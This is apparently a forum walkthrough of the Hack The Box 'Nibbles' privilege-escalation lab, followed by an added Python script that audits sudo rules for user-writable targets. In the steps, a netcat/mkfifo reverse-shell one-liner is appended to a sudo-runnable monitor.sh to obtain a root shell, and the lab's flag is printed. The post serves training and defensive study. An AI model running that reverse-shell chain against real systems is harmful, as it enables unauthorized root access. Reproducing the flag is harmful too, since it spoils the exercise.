Getting Started / Nibbles - Privilege Escalation

:warning: Before solving the current challenge, I recommend that you complete the previous section: https://academy.hackthebox.com/module/77/section/852
# This will allow you to perform a reverse shell connection


• From Nibbles - Initial Foothold we already have what we need: the credentials and the uploaded shell.sh script that gives us access to the nibbler user's directories.
• We can also run python3 -c 'import pty; pty.spawn("/bin/bash")', which gets us a friendlier (TTY) shell.

If you are not subscribed, some tasks can be performed using a virtual machine. :white_check_mark:

TASK DESCRIPTION:
• Escalate privileges and submit the root.txt flag.

:warning: Your starting directory must be /home/nibbler

STEPS TO EXECUTION: :fire:

  1. As mentioned in the previous section, we unzip the personal.zip file and find a file called monitor.sh.

  2. As shown in the screenshot above, we open the monitor.sh file. The shell script monitor.sh is a monitoring script, and it is owned by our nibbler user and writable.
    Run nibbler@Nibbles:/home/nibbler$ cat personal/stuff/monitor.sh to explore the contents of the file.

  3. Now we can add the necessary line of code to monitor.sh to get root privileges. Let’s run the following command: nibbler@Nibbles:/home/nibbler$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.49 8443 >/tmp/f' | tee -a personal/stuff/monitor.sh. As a result, the monitor.sh file has a new line of code:

• 10.10.15.49 - VPN IP (use your current one)
• 8443 - new listening port for the reverse shell with root privileges

  4. In a new local terminal, let’s run the command: nc -nvlp 8443.

  5. In the reverse shell on the target, don’t forget to check the sudo -l output:


    Good news: we can use sudo without a password to run our script.

  6. Run the command: sudo /home/nibbler/personal/stuff/monitor.sh.

Use the full path, otherwise the system will prompt you for a password :warning:

  7. In the new local terminal, where we ran nc -nvlp 8443, we now have a root reverse shell:

  8. Run whoami - root

  9. Run pwd - /home/nibbler

  10. Run cd /root && ls - root.txt / finally cat root.txt
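The two conditions this escalation chains together (a sudoers NOPASSWD rule and a target script the same user can write) are exactly what a host audit should flag. Below is an added defender-side check, not part of the original post: it parses sudo -l output and reports rules whose command file, or the directory holding it, the invoking user can modify. The sample sudo -l text is constructed to match the rule the walkthrough relies on.

```python
import os
import re
import stat
from typing import Iterable, List, NamedTuple

class SudoRule(NamedTuple):
    runas: str       # user the command runs as, e.g. "root"
    nopasswd: bool   # True when the NOPASSWD tag is present
    command: str     # command exactly as written in sudoers

# Rule lines of `sudo -l` look like: "    (root) NOPASSWD: /path/a, /path/b"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")
# Constructed sample in the shape `sudo -l` prints; the rule line is the one
# the walkthrough relies on (nibbler runs monitor.sh as root, no password).
SAMPLE_SUDO_L = """User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

def parse_sudo_l(output: str) -> List[SudoRule]:
    """Extract (run-as user, NOPASSWD flag, command) from `sudo -l` output."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()   # "(ALL : ALL)" -> "ALL"
        nopasswd = "NOPASSWD" in m.group("tags").replace(":", " ").split()
        for cmd in m.group("cmds").split(","):
            rules.append(SudoRule(runas, nopasswd, cmd.strip()))
    return rules

def _writable_by(st: os.stat_result, uid: int, gids: set) -> bool:
    m = st.st_mode
    return bool((st.st_uid == uid and m & stat.S_IWUSR)
                or (st.st_gid in gids and m & stat.S_IWGRP) or m & stat.S_IWOTH)

def user_can_modify(path: str, uid: int, gids: Iterable[int]) -> bool:
    """True if uid can write the command file, or the directory holding it
    (a writable parent lets the file be replaced or, if missing, created)."""
    gids, nearest = set(gids), path
    while not os.path.exists(nearest):              # missing target: the closest
        nearest = os.path.dirname(nearest) or "/"   # existing ancestor decides
    parent = os.path.dirname(nearest) or "/"
    return any(_writable_by(os.stat(p), uid, gids) for p in (nearest, parent))

def risky_sudo_targets(rules: Iterable[SudoRule], uid: int,
                       gids: Iterable[int]) -> List[SudoRule]:
    """Rules letting uid run, as root, an absolute-path command uid controls
    ("ALL" and relative entries are skipped; they need a separate review)."""
    return [r for r in rules
            if r.runas in ("root", "ALL") and r.command.split()[0].startswith("/")
            and user_can_modify(r.command.split()[0], uid, set(gids))]
```

Run it on a host as the low-privilege user whose sudo -l output you pasted; any rule it returns means that user effectively holds root, and the fix is to make the script root-owned and non-writable (or drop the rule).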

RESULT: de5e5d6619862a8aa5b9b212314e0cdd :eyes:

:gem: Don’t use spoilers; do it all on your own, and then do it better one more time.


Thanks a lot. I did every step correctly except for this. I was stuck for hours trying to start a reverse shell by running monitor.sh.